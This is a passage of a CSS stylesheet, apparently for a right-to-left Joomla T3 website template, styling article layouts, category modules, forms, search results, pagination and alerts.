ul.categories-module li,
.category-module li,
ul.category-module li {
  list-style: none;
  padding: 10px 0;
  border-top: 1px dotted #eeeeee;
}
.categories-module li:first-child,
ul.categories-module li:first-child,
.category-module li:first-child,
ul.category-module li:first-child {
  border-top: 0;
  padding-top: 0;
}
.categories-module h4,
ul.categories-module h4,
.category-module h4,
ul.category-module h4,
.categories-module .mod-articles-category-title,
ul.categories-module .mod-articles-category-title,
.category-module .mod-articles-category-title,
ul.category-module .mod-articles-category-title {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
  display: block;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby,
.categories-module .mod-articles-category-date,
ul.categories-module .mod-articles-category-date,
.category-module .mod-articles-category-date,
ul.category-module .mod-articles-category-date {
  color: #666666;
  font-size: 12px;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby {
  font-weight: bold;
  margin-left: 10px;
}
.feed h4 {
  font-weight: bold;
}
.feed .newsfeed,
.feed ul.newsfeed {
  border-top: 1px solid #eeeeee;
}
.feed .newsfeed .feed-link,
.feed ul.newsfeed .feed-link,
.feed .newsfeed h5.feed-link,
.feed ul.newsfeed h5.feed-link {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
}
.latestusers,
ul.latestusers {
  margin-right: 0;
}
.latestusers li,
ul.latestusers li {
  background: #eeeeee;
  display: inline-block;
  padding: 5px 10px;
  border-radius: 0;
}
.module-ct .whosonline {
  margin-right: 0;
}
.module-ct .whosonline > li {
  display: inline-block;
  border-radius: 0;
  background: #eeeeee;
  padding: 2px 5px;
  margin: 0 0 5px 5px;
  white-space: nowrap;
}
.stats-module dt,
.stats-module dd {
  display: inline-block;
  margin: 0;
}
.stats-module dt {
  font-weight: bold;
  width: 35%;
}
.stats-module dd {
  width: 60%;
}
.tagspopular ul {
  display: block;
  margin: 0;
  padding: 0;
  list-style: none;
  overflow: hidden;
}
.tagspopular ul > li {
  background: #eeeeee;
  border-radius: 3px;
  color: #666666;
  display: block;
  float: right;
  margin: 0 0 5px 5px;
  padding: 3px 10px;
}
.tagspopular ul > li > a {
  color: #666666;
}
.tagspopular ul > li .tag-count {
  background: transparent;
  color: #666666;
  display: inline;
  margin: 0;
  padding: 0;
}
.tagspopular ul > li:hover {
  background: #cc0000;
  color: #ffffff;
}
.tagspopular ul > li:hover a {
  color: #ffffff;
  text-decoration: none;
}
.tagspopular ul > li:hover .tag-count {
  color: #ffffff;
}
.tagspopular.tagscloud .tag {
  background: #eeeeee;
  border-radius: 5px;
  display: inline-block;
  margin-bottom: 5px;
  padding: 5px 10px;
}
.tagspopular.tagscloud .tag a {
  color: #666666;
}
.tagspopular.tagscloud .tag a:hover,
.tagspopular.tagscloud .tag a:focus,
.tagspopular.tagscloud .tag a:active {
  color: #800000;
}
.tagssimilar ul {
  margin: 0;
  padding: 0;
  list-style: none;
}
.tagssimilar ul > li {
  border-bottom: 1px solid #eeeeee;
  padding: 8px 0;
}
.tagssimilar ul > li > a {
  color: #666666;
}
.tagssimilar ul > li > a:hover,
.tagssimilar ul > li > a:focus,
.tagssimilar ul > li > a:active {
  color: #800000;
}
.module-ct > ul.archive-module {
  list-style: none;
  margin: 0;
  padding: 0;
}
.module-ct > ul.archive-module i {
  color: #999999;
  margin-left: 2px;
}
.module-ct > ul.archive-module li {
  border-bottom: 1px solid #eeeeee;
  padding: 7px 0;
}
.module-ct > ul.archive-module li a {
  color: #666666;
}
.module-ct > ul.archive-module li a:hover,
.module-ct > ul.archive-module li a:focus,
.module-ct > ul.archive-module li a:active {
  color: #cc0000;
}
.module-ct > ol.breadcrumb {
  padding: 6px 12px;
  margin-right: 0;
}
.newsflash img {
  width: 100%;
}

.item-page {
  margin-bottom: 40px;
}
.items-leading .leading {
  margin-bottom: 40px;
}
.items-row .item {
  margin-bottom: 40px;
}
.divider-vertical {
  margin: 20px 0 40px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.article-aside {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
  padding: 0;
}
.article-header + .article-aside {
  margin-top: -10px;
}
.article-header {
  display: flex;
  align-items: flex-start;
}
.article-header .label {
  border-radius: 3px;
  display: inline-block;
  line-height: 1;
  padding: 4px 6px;
}
.item-page .article-aside {
  font-size: 14px;
  margin-bottom: 40px;
}
.article-info {
  margin: 0;
  width: 85%;
}
.article-info .article-info-term {
  display: none;
}
.article-info dd {
  display: inline-block;
  margin-right: 0;
  margin-left: 10px;
  margin-bottom: 5px;
  white-space: nowrap;
}
.article-info dd strong {
  font-weight: 600;
}
.article-info dd .fa {
  margin-left: 5px;
}
.category-name {
  text-transform: capitalize;
}
.category-name .fa {
  display: none;
}
.category-name a {
  background: #cc0000;
  color: #fff;
  padding: 2px 5px;
}
.category-name a:hover,
.category-name a:focus,
.category-name a:active {
  background: #800000;
  color: #fff;
  text-decoration: none;
}
.article-footer {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
}
article img,
.article-intro img {
  display: block;
  max-width: 100%;
  height: auto;
}
article img[align="right"],
.article-intro img[align="right"],
article .img-fulltext-left,
.article-intro .img-fulltext-left,
article .img-intro-left,
.article-intro .img-intro-left,
article .img_caption.left,
.article-intro .img_caption.left,
article .pull-left.item-image,
.article-intro .pull-left.item-image {
  margin-left: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align="right"],
  .article-intro img[align="right"],
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img_caption.left,
  .article-intro .img_caption.left,
  article .pull-left.item-image,
  .article-intro .pull-left.item-image {
    margin: 0 0 20px;
  }
}
article img[align="left"],
.article-intro img[align="left"],
article .img-fulltext-right,
.article-intro .img-fulltext-right,
article .img_caption.right,
.article-intro .img_caption.right,
article .img-intro-right,
.article-intro .img-intro-right,
article .pull-right.item-image,
.article-intro .pull-right.item-image {
  margin-right: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align="left"],
  .article-intro img[align="left"],
  article .img-fulltext-right,
  .article-intro .img-fulltext-right,
  article .img_caption.right,
  .article-intro .img_caption.right,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .pull-right.item-image,
  .article-intro .pull-right.item-image {
    margin: 0 0 20px;
  }
}
article .pull-none.item-image img,
.article-intro .pull-none.item-image img {
  width: 100%;
}
.img-intro-none,
.img-intro-left,
.img-intro-right,
.img-fulltext-none,
.img-fulltext-left,
.img-fulltext-right,
.img_caption {
  position: relative;
  margin-bottom: 20px;
  max-width: 100%;
}
.img-fulltext-left {
  float: right;
}
.img-fulltext-right {
  float: left;
}
.img_caption > img {
  margin-bottom: 1px !important;
}
.img_caption p.img_caption {
  background: #eeeeee;
  color: #666666;
  font-size: 12px;
  width: 100%;
  margin: 0;
  padding: 5px;
  text-align: center;
  clear: both;
}
.pull-right.article-image-intro {
  float: right !important;
  margin-right: 0 !important;
}
.pull-right.article-image-intro img {
  margin-right: 0 !important;
  margin-left: 20px;
}
@media screen and (max-width: 992px) {
  article img,
  .article-intro img,
  article img[align=left],
  .article-intro img[align=left],
  article img[align=right],
  .article-intro img[align=right],
  article .img_caption,
  .article-intro .img_caption,
  article .article-image-full,
  .article-intro .article-image-full,
  article .article-image-intro,
  .article-intro .article-image-intro,
  article .img-intro-none,
  .article-intro .img-intro-none,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .img-fulltext-none,
  .article-intro .img-fulltext-none,
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-fulltext-right,
  .article-intro .img-fulltext-right {
    float: none !important;
    margin-right: 0;
    margin-left: 0;
    width: 100% !important;
  }
}
.item-page .tags {
  border-top: 1px solid #eeeeee;
  padding: 10px 0;
}
.item-page .tags span {
  display: inline-block;
  margin-bottom: 10px;
}
.item-page .tags a {
  background: #ffffff;
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #666666;
  padding: 5px;
}
.item-page .tags a:hover,
.item-page .tags a:focus,
.item-page .tags a:active {
  background: #999999;
  border-color: #999999;
  color: #800000;
}
.archive .filters {
  margin: 0 0 20px;
}
#archive-items article {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
  padding-bottom: 20px;
}
#archive-items article h2.article-title {
  font-size: 24px;
  line-height: 1.3;
}
article aside .btn-group > .dropdown-toggle,
article aside .btn-group > .dropdown-toggle:hover,
article aside .btn-group > .dropdown-toggle:active,
article aside .btn-group > .dropdown-toggle:focus {
  padding: 2px 5px;
}
article aside .btn-group > .dropdown-toggle .caret {
  margin-right: 2px;
}
.tag-category .filters {
  border-bottom: 1px solid #eeeeee;
  padding: 20px 0;
}
.tag-category .filters #filter-search {
  float: right;
}
.tag-category .filters.btn-toolbar > .btn-group {
  margin-right: 0;
}
.tag-category .thumbnails {
  list-style: none;
  margin: 0;
  padding: 0;
}
.tag-category .thumbnails li {
  background: transparent;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0;
}
.tag-category .thumbnails li > h3 {
  margin-top: 0;
}
.tag-category .com-tags-filter-field-wrap {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-between;
  margin-bottom: 2rem;
}
.tag-category .com-tags-filter-field-wrap .btn-group {
  display: flex;
  margin-left: 0;
}
.readmore {
  margin-top: 20px;
}
.row-even,
.row-odd {
  padding: 5px;
  width: 99%;
  border-bottom: 1px solid #dddddd;
}
.row-odd {
  background-color: transparent;
}
.row-even {
  background-color: #f9f9f9;
}
.blog-row-rule,
.blog-item-rule {
  border: 0;
}
.row-fluid .row-reveal {
  visibility: hidden;
}
.row-fluid:hover .row-reveal {
  visibility: visible;
}
.nav-list > li.offset > a {
  padding-right: 30px;
  font-size: 12px;
}
.list-striped,
.row-striped {
  list-style: none;
  line-height: 20px;
  text-align: right;
  vertical-align: middle;
  border-top: 1px solid #dddddd;
  margin-right: 0;
  padding-right: 0;
}
.list-striped li,
.list-striped dd,
.row-striped .row,
.row-striped .row-fluid {
  border-bottom: 1px solid #dddddd;
  padding: 10px 15px;
}
.list-striped li:nth-child(odd),
.list-striped dd:nth-child(odd),
.row-striped .row:nth-child(odd),
.row-striped .row-fluid:nth-child(odd) {
  background-color: #f9f9f9;
}
.list-striped li:hover,
.list-striped dd:hover,
.row-striped .row:hover,
.row-striped .row-fluid:hover {
  background-color: #f5f5f5;
}
.row-striped .row-fluid {
  width: 97%;
}
.row-striped .row-fluid [class*="span"] {
  min-height: 10px;
}
.row-striped .row-fluid [class*="span"] {
  margin-right: 8px;
}
.row-striped .row-fluid [class*="span"]:first-child {
  margin-right: 0;
}
.list-condensed li {
  padding: 5px 10px;
}
.row-condensed .row,
.row-condensed .row-fluid {
  padding: 5px 10px;
}
.list-bordered,
.row-bordered {
  list-style: none;
  line-height: 18px;
  text-align: right;
  vertical-align: middle;
  margin-right: 0;
  border: 1px solid #dddddd;
}
.login-wrap .other-links ul {
  padding-right: 20px;
}
#jform_privacyconsent_privacy-lbl a.modal,
#jform_consentbox-lbl a.modal,
#jform_terms_terms-lbl a.modal,
#jform_profile_tos-lbl a.modal {
  display: inline-block;
  position: relative;
}
#jform_terms_terms input[type="radio"],
#jform_privacyconsent_privacy input[type="radio"],
#jform_consentbox input[type="radio"],
#jform_profile_tos input[type="radio"],
#jform_terms_terms input[type="checkbox"],
#jform_privacyconsent_privacy input[type="checkbox"],
#jform_consentbox input[type="checkbox"],
#jform_profile_tos input[type="checkbox"] {
  position: relative;
  margin: 0;
  margin-left: 5px;
  width: auto;
}
#jform_terms_terms label,
#jform_privacyconsent_privacy label,
#jform_consentbox label,
#jform_profile_tos label {
  margin-left: 10px;
  padding: 0;
}
.form-register fieldset {
  padding: 0 0 10px;
}
.form-register p {
  margin: 0 0 5px;
}
.form-register p.form-des {
  margin: 15px 0;
}
.form-register label {
  display: block;
  float: right;
  font-weight: bold;
  text-align: left;
  width: 130px;
}
.form-register .input,
.form-register .inputbox {
  margin-right: 10px;
  width: 200px;
}
.form-register .btn,
.form-register .button {
  margin-right: 140px;
}
.registration fieldset dt {
  margin-left: 5px;
}
.admintable textarea {
  max-width: 90% !important;
  resize: none;
}
.com_mailto body {
  padding: 10px;
}
.com_mailto .t3-mainbody {
  padding-top: 0;
  padding-bottom: 0;
}
.com_mailto .t3-content {
  width: auto;
}
#mailto-window {
  background: #fff;
  margin: 10px 0 20px;
  padding: 0;
  position: relative;
}
#mailto-window h2 {
  margin-top: 0;
  margin-bottom: 20px;
}
#mailtoForm .formelm {
  padding: 5px 0;
  vertical-align: middle;
  overflow: hidden;
}
#mailtoForm .formelm label {
  display: inline-block;
  float: right;
  font-weight: bold;
  vertical-align: middle;
  width: 100px;
}
#mailtoForm p {
  margin-top: 20px;
}
#mailtoForm .input,
#mailtoForm .inputbox {
  width: 65%;
}
#mailtoForm .btn,
#mailtoForm .button,
#mailtoForm button {
  margin-left: 5px;
}
.user-details {
  padding: 10px 0;
}
.user-details p {
  margin: 0 0 5px;
}
.user-details label {
  display: block;
  float: right;
  font-weight: bold;
  text-align: left;
  width: 130px;
}
.user-details .input,
.user-details .inputbox {
  margin-right: 10px;
  width: 200px;
}
.user-details .btn,
.user-details button {
  margin-right: 140px;
}
.user-details .paramlist .paramlist_key {
  padding: 0 0 5px;
  width: 130px;
}
.user-details .paramlist .paramlist_value {
  padding: 0 0 5px;
}
.user-details .user_name span {
  font-weight: bold;
  padding-right: 10px;
}
.reset .form-validate p,
.remind .form-validate p {
  background: #eeeeee;
  border: 1px solid #eeeeee;
  margin-bottom: 20px;
  padding: 10px 20px;
  border-radius: 0;
}
.reset .form-validate fieldset dl,
.remind .form-validate fieldset dl {
  margin: 0;
}
.reset .form-validate fieldset dt,
.remind .form-validate fieldset dt {
  margin: 4px 0 0 0;
}
.profile-edit input {
  position: relative;
  min-height: 1px;
  padding-left: 6px;
  padding-right: 6px;
}
@media (min-width: 768px) {
  .profile-edit input {
    float: right;
    width: 50%;
  }
}
.profile-edit select {
  position: relative;
  min-height: 1px;
  padding-left: 6px;
  padding-right: 6px;
}
@media (min-width: 768px) {
  .profile-edit select {
    float: right;
    width: 50%;
  }
}
.profile-edit select + button {
  margin-right: 5px;
}
#searchForm:before,
#searchForm:after {
  display: table;
  content: " ";
}
#searchForm:after {
  clear: both;
}
#searchForm fieldset {
  margin: 20px 0;
}
#searchForm legend {
  margin-bottom: 10px;
}
#searchForm select {
  width: auto;
  display: inline-block;
  margin-right: 5px;
  padding-right: 5px;
}
#searchForm .form-limit {
  margin-top: 20px;
}
#searchForm .form-limit .counter {
  margin-top: 0;
  border: none;
  font-size: 14px;
  font-weight: bold;
  color: #0077bb;
}
@media screen and (max-width: 768px) {
  #searchForm .radio-inline,
  #searchForm .checkbox-inline {
    display: block;
    width: 100%;
    margin-right: 0;
  }
}
.search-results {
  margin-top: 20px;
}
.search-results .result-title {
  font-size: 16px;
  font-weight: bold;
  margin-top: 20px;
}
.search-results .result-category {
  font-size: 12px;
  color: #999999;
}
.search-results .result-text {
  margin-top: 5px;
  margin-bottom: 5px;
}
.search-results .result-url {
  color: #666666;
  margin-top: 20px;
}
.search-results .result-created {
  font-size: 12px;
  color: #999999;
}
div.finder {
  margin-bottom: 20px;
}
div.finder .input-group {
  display: flex;
}
div.finder .input-group input {
  flex: 1;
}
div.finder .com-finder__tips {
  margin-top: 20px;
}
#finder-filter-window {
  margin-top: 20px;
}
#finder-filter-window #finder-filter-select-dates {
  display: grid;
  grid-template-columns: 1fr;
  gap: 10px;
  margin-bottom: 40px;
}
@media screen and (min-width: 1200px) {
  #finder-filter-window #finder-filter-select-dates {
    grid-template-columns: repeat(2, 1fr);
  }
}
#finder-filter-window #finder-filter-select-dates .filter-date {
  display: flex;
  flex-wrap: wrap;
  padding: 0;
  gap: 10px;
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date label {
  flex-basis: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date select.inputbox {
  margin: 0;
  width: 100% !important;
  max-width: unset;
}
#finder-filter-window #finder-filter-select-dates .filter-date .field-calendar {
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date .field-calendar .form-control {
  flex: 1;
  max-width: unset;
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date .chzn-container {
  margin-bottom: 6px;
}
#finder-filter-window #finder-filter-select-dates .filter-date br {
  display: none;
}
#finder-filter-window .filter-branch {
  display: flex;
  flex-wrap: wrap;
  flex-direction: column;
  gap: 10px;
  width: 100%;
}
@media (min-width: 1200px) {
  #finder-filter-window .filter-branch {
    flex-direction: row;
  }
}
#finder-filter-window .filter-branch .control-label {
  padding: 0;
  margin-bottom: 10px;
}
#finder-filter-window .filter-branch .controls {
  margin-right: 0;
}
#finder-filter-window .filter-branch .controls select {
  color: #9e9e9e;
  width: 100%;
}
.contact .contact-form .checkbox input#jform_contact_email_copy {
  margin-right: 0;
}
.contact .thumbnail {
  padding: 4px;
}
.contact dd::after {
  display: none;
}
.contact .icon-address::before {
  content: '\f02d';
}
.contact .icon-fax::before {
  content: '\f109';
}
.contact .accordion-heading .accordion-toggle {
  font-weight: bold;
}
#archive-items > li {
  line-height: normal;
  margin: 0;
  overflow: visible;
  padding: 0;
}
#archive-items .intro {
  clear: both;
  overflow: hidden;
}
.categories-list {
  margin-bottom: 20px;
}
.contact-category ul.category {
  border-top: 0;
  overflow: hidden;
}
.contact-category ul.category li.row-fluid {
  border: 1px solid #eeeeee;
  width: 100%;
  margin-left: 0;
  margin-right: 0;
}
.contact-category ul.category li.row-fluid:before,
.contact-category ul.category li.row-fluid:after {
  display: table;
  content: " ";
}
.contact-category ul.category li.row-fluid:after {
  clear: both;
}
.contact-category ul.category li.row-fluid > div {
  margin: 0;
}
.contact-category .cat-children ul {
  border: 0;
  border-top: 1px solid #eeeeee;
}
.contact-category .cat-children ul li {
  background: transparent;
  border-bottom: 1px solid #eeeeee;
  padding: 5px 0 5px 0;
}
.contact-category .cat-children ul li h4 {
  border-right: 1px dotted #999999;
  font-size: 14px;
  font-weight: 600;
  padding: 0;
  padding-right: 15px;
  margin-right: 20px;
  position: relative;
}
.contact-category .cat-children ul li h4:after {
  border-top: 1px dotted #999999;
  display: block;
  content: "";
  position: absolute;
  right: 0;
  top: 8px;
  height: 1px;
  width: 10px;
}
.contact-category .cat-children ul li li h4 {
  margin-right: 40px;
}
.contact-category .cat-children ul li li li h4 {
  margin-right: 60px;
}
.contact-category .cat-children ul li li li li h4 {
  margin-right: 80px;
}
.contact-category .cat-children ul li:last-child {
  border: 0;
}
.category-item:before,
.category-item:after {
  display: table;
  content: " ";
}
.category-item:after {
  clear: both;
}
.category-item .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.category-item .category-item {
  margin-bottom: 0;
  margin-right: 40px;
}
.category-item .category-item .page-header {
  font-size: 14px;
}
.cat-children .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.newsfeed-category > h2,
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed-category .category-desc,
.newsfeed .category-desc {
  margin-bottom: 20px;
}
.newsfeed-category .category li:before,
.newsfeed .category li:before,
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  display: table;
  content: " ";
}
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  clear: both;
}
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed .feed-description {
  margin-bottom: 20px;
  font-size: 16px;
}
.newsfeed .feed-item-description .feed-description {
  font-size: 14px;
}
.newsfeed ol li > a {
  font-weight: bold;
  font-size: 16px;
}
.article-content .pagination ul {
  border-right: 1px solid #eeeeee;
}
.article-content .pagination li {
  float: right;
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #eeeeee;
  border-right: 0;
}
.article-content .pagination li a {
  border: 0;
  text-decoration: none;
  background-color: transparent;
  line-height: normal;
  padding: 0;
}
.pagenavcounter {
  margin: 0 0 20px;
  font-weight: bold;
}
#article-index,
.article-index {
  margin: 0 20px 20px 0;
  padding: 10px;
  width: 25%;
  border: 1px solid #eeeeee;
  border-radius: 0;
}
#article-index ul,
.article-index ul {
  margin: 0;
  padding: 0;
  border: 0;
}
#article-index ul > li,
.article-index ul > li {
  border: 0;
  margin-top: 2px;
}
#article-index ul > li > a,
.article-index ul > li > a {
  border: 0;
  padding: 5px;
  border-radius: 0;
}
#article-index ul > .active > a,
.article-index ul > .active > a {
  border: 0;
  background: #cc0000;
  color: #ffffff;
}
#article-index ul > .active > a:hover,
.article-index ul > .active > a:hover,
#article-index ul > .active > a:active,
.article-index ul > .active > a:active,
#article-index ul > .active > a:focus,
.article-index ul > .active > a:focus {
  border: 0;
  background: #cc0000;
  color: #ffffff;
}
.pagenavigation ul.pagination,
.pagenav {
  float: none;
  margin: 0;
  padding: 0;
  list-style: none;
  display: flex;
  justify-content: space-between;
}
.pagenavigation ul.pagination > li,
.pagenav > li {
  margin: 0;
  padding: 0;
  float: right;
}
.pagenavigation ul.pagination > li.pagenav-prev,
.pagenav > li.pagenav-prev,
.pagenavigation ul.pagination > li.previous,
.pagenav > li.previous {
  margin-left: 10px;
}
.pagenavigation ul.pagination > li.pagenav-next,
.pagenav > li.pagenav-next,
.pagenavigation ul.pagination > li.next,
.pagenav > li.next {
  margin-right: auto;
}
.pagenavigation ul.pagination li > a,
.pagenav li > a {
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #dddddd;
  border-radius: 0;
}
.pagenavigation ul.pagination li > a:hover,
.pagenav li > a:hover,
.pagenavigation ul.pagination li > a:active,
.pagenav li > a:active,
.pagenavigation ul.pagination li > a:focus,
.pagenav li > a:focus {
  background-color: #eeeeee;
}
.items-more h3 {
  margin: 0 0 20px;
}
.items-more .nav > li {
  border-top: 1px solid #eeeeee;
}
.items-more .nav > li > a {
  padding: 6px 5px;
}
.back_button a {
  display: block;
  margin: 10px 0;
}
.filters {
  margin: 10px 0 5px;
}
.display-limit {
  margin: 10px 0 5px;
}
.filters .display-limit {
  float: left;
  text-align: left;
}
#system-message dt {
  font-weight: bold;
}
#system-message dd {
  font-weight: bold;
}
#system-message dd.message ul,
#system-message dd.error ul,
#system-message dd.notice ul {
  margin: 0;
  padding: 0;
}
#system-message dd.message ul li,
#system-message dd.error ul li,
#system-message dd.notice ul li {
  background: none;
  margin: 0;
  padding: 5px;
}
.alert-message {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.alert-message hr {
  border-top-color: #c9e2b3;
}
.alert-message .alert-link {
  color: #356635;
}
.alert-notice {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.alert-notice hr {
  border-top-color: #a6e1ec;
}
.alert-notice .alert-link {
  color: #2d6987;
}
.alert-error {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.alert-error hr {
  border-top-color: #e4b9c0;
}
.alert-error .alert-link {
  color: #953b39;
}
.alert-error .alert-message {
  background: transparent;
  color: inherit;
}
.tip-wrap {
  background: #fff6df;
  border: 1px solid #fb3;
  border-radius: 5px;
  -webkit-box-shadow: none;
  box-shadow: none;
  max-width: 300px;
  z-index: 999;
}
.tip-title {
  border-bottom: 1px solid #fb3;
  font-weight: bold;
  padding: 5px 10px;
}
.tip-text {
  font-size: 14px;
  margin: 0;
  padding: 5px 10px;
}
.hasTip img {
  border: none;
  margin: 0 0 0 5px;
}
@media (min-width: 768px) {
  .languageswitcherload {
    float: left;
    width: 100%;
  }
  .languageswitcherload .mod-languages {
    text-align: left;
  }
}
div.calendar {
  width: 187px;
}
dl.tabs {
  border-bottom: 1px solid #d9d9d9;
  display: block;
  clear: both;
  margin-bottom: 0;
}
dl.tabs:before,
dl.tabs:after {
  display: table;
  content: " ";
}
dl.tabs:after {
  clear: both;
}
dl.tabs dt.tabs {
  border: 1px solid #d9d9d9;
  display: inline-block;
  padding: 10px 20px;
  margin-left: 5px;
  margin-bottom: -1px;
}
dl.tabs dt.tabs h3 {
  margin: 0;
  font-size: 14px;
}
dl.tabs dt.tabs h3 a {
  color: #444444;
  outline: none;
}
dl.tabs dt.tabs h3 a:hover,
dl.tabs dt.tabs h3 a:focus,
dl.tabs dt.tabs h3 a:active {
  color: #800000;
  text-decoration: none;
}
dl.tabs dt.tabs.open {
  border-bottom-color: #ffffff;
}
dl.tabs dt.tabs.open a {
  font-weight: bold;
}
.iframe-bordered {
  border: 1px solid #dddddd;
}
.chzn-container {
  display: inline-block;
  vertical-align: middle;
}
.chzn-container-single .chzn-single,
.chzn-container-multi .chzn-choices .search-field input,
.chzn-container-single .chzn-search input {
  height: 26px;
}
.chzn-container-single .chzn-drop,
.chzn-container .chzn-drop {
  -webkit-box-sizing: content-box !important;
  -moz-box-sizing: content-box !important;
  box-sizing: content-box !important;
}
.input-prepend .chzn-container-single .chzn-single {
  border-color: #cccccc;
  height: 26px;
  border-radius: 3px 0 0 3px;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.input-prepend .chzn-container-active .chzn-single-with-drop {
  border-radius: 3px 0 0 0;
}
.input-prepend .chzn-container-single .chzn-drop {
  border-color: #cccccc;
}
.btn-group .chzn-results {
  white-space: normal;
}
.js-stools-container-filters .js-stools-field-filter .chzn-single,
.js-stools-container-filters .js-stools-field-filter .chzn-drop {
  border-radius: 0;
}
.js-stools-container-filters .js-stools-field-filter #filter_tag_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_category_id_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_access_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_author_id_chzn {
  width: auto !important;
}
.js-stools-container-filters .js-stools-field-filter #filter_tag_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_category_id_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_access_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_author_id_chzn ul li input {
  width: 208px !important;
  height: 24px !important;
}
.picker {
  background: green !important;
}
.picker .picker__box .picker__header {
  display: flex;
}
.picker .picker__box .picker__header .picker__select--month {
  margin-right: 20px;
}
#glossary-detail .modal-dialog {
  height: 100vh;
  position: relative;
}
#glossary-detail .modal-content {
  padding: 24px;
  position: absolute;
  top: 50%;
  transform: translateY(-50%);
}
#glossary-detail .modal-content .modal-header {
  flex-direction: row-reverse;
  justify-content: space-between;
  padding: 0 0 24px;
}
#glossary-detail .modal-content .modal-header::after,
#glossary-detail .modal-content .modal-header::before {
  display: none;
}
#glossary-detail .modal-content .modal-header .close {
  padding: 6px 10px;
  background-color: #005788;
  color: #fff;
  opacity: 1;
  transition: all 0.3s ease-in-out;
}
#glossary-detail .modal-content .modal-header .close:hover {
  opacity: .7;
}
#glossary-detail .modal-content .modal-body {
  margin-top: 24px;
}

.page-header {
  padding-bottom: 20px;
  margin: 0 0 20px;
  border-bottom: 1px solid #eeeeee;
}
.page-title,
.page-header h1 {
  line-height: 1;
  margin: 0;
}
.page-subheader {
  border-bottom: 1px solid #eeeeee;
  margin: 0 0 20px;
  padding-bottom: 20px;
}
.page-subheader:before,
.page-subheader:after {
  display: table;
  content: " ";
}
.page-subheader:after {
  clear: both;
}
.page-subtitle,
.page-subheader h2 {
  line-height: 1;
  margin: 0;
}
.page-header + .page-subheader {
  margin-top: -20px;
}
.article-title h1 a:hover,
.article-header h1 a:hover,
.article-title h2 a:hover,
.article-header h2 a:hover,
.article-title h1 a:active,
.article-header h1 a:active,
.article-title h2 a:active,
.article-header h2 a:active,
.article-title h1 a:focus,
.article-header h1 a:focus,
.article-title h2 a:focus,
.article-header h2 a:focus {
  text-decoration: none;
}
.article-title,
.article-header h1 {
  margin: 0 0 20px 0;
}
@media screen and (max-width: 767px) {
  .article-title,
  .article-header h1 {
    font-size: 24px;
  }
}
@media screen and (max-width: 767px) {
  h2.article-title,
  .article-header h2 {
    font-size: 24px;
  }
}
.item-title {
  font-weight: bold;
}
.jumbotron:before,
.jumbotron:after {
  display: table;
  content: " ";
}
.jumbotron:after {
  clear: both;
}
.jumbotron h1,
.jumbotron h2,
.jumbotron h3 {
  margin-top: 0;
}
.jumbotron p {
  color: #666666;
}
.jumbotron p:last-child {
  margin-bottom: 0;
}
.container .jumbotron {
  border-radius: 0;
}
.jumbotron .btn {
  margin-top: 20px;
  margin-bottom: 20px;
}
.masthead {
  padding-top: 40px;
  padding-bottom: 40px;
  text-align: center;
}
.masthead p:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .masthead {
    padding-top: 80px;
    padding-bottom: 80px;
  }
  .masthead h1 {
    font-size: 84px;
  }
  .masthead p {
    font-size: 28px;
  }
  .masthead .btn-lg {
    padding: 15px 40px;
    font-size: 24px;
  }
}
.jumbotron-primary {
  background-color: #cc0000;
}
.jumbotron-primary h1,
.jumbotron-primary h2,
.jumbotron-primary h3 {
  color: #ffffff;
}
.jumbotron-primary p {
  color: #ffcccc;
}
.jumbotron-primary .btn-primary {
  border-color: #fff;
}
.page-masthead:before,
.page-masthead:after {
  display: table;
  content: " ";
}
.page-masthead:after {
  clear: both;
}
.page-masthead .jumbotron {
  margin-top: 0 !important;
  margin-bottom: 0 !important;
  padding-top: 60px;
  padding-bottom: 60px;
  padding-right: 0;
  padding-left: 0;
}
@media screen and (max-width: 991px) {
